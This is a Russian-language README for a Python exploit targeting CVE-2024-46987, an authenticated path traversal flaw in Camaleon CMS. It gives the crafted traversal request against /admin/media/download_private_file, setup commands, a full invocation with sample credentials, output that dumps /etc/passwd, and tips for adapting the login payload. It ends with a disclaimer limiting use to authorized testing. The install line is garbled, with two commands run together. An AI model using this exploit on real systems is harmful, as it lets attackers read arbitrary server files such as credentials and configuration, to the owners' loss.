
Эксплойт, созданный с использованием Python
CVE-2024-46987 — это уязвимость обхода пути с аутентификацией (CWE-22) в Camaleon CMS (система управления контентом на Ruby on Rails). Она позволяет авторизованному пользователю (даже с низкими привилегиями) читать произвольные файлы на сервере через действие MediaController#download_private_file.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:NЗлоумышленник с действительными учетными данными может отправить специально сформированный запрос по адресу: /admin/media/download_private_file?file=../../../../etc/passwd
pip install -r requirements.txtИЛИ
pip install -r requests firepython cms-exploit.py \
--url http://target.local \
--username neal \
--password 'Caffery@123' \
--cmd /etc/passwd
[+] Login successful
[*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Success – content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.
Примечание: Скрипт предполагает использование формы входа в стиле Rails (user[email], user[password], authenticity_token). Измените поля полезной нагрузки, если ваша цель использует нестандартные имена.
Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности.
Используйте только на системах, которыми вы владеете, или на которые имеете явное письменное разрешение на тестирование (например, программы bug bounty, внутренние пентесты, лаборатории вроде HTB). Несанкционированное использование может нарушать законы. Автор не несет ответственности за неправомерное использование.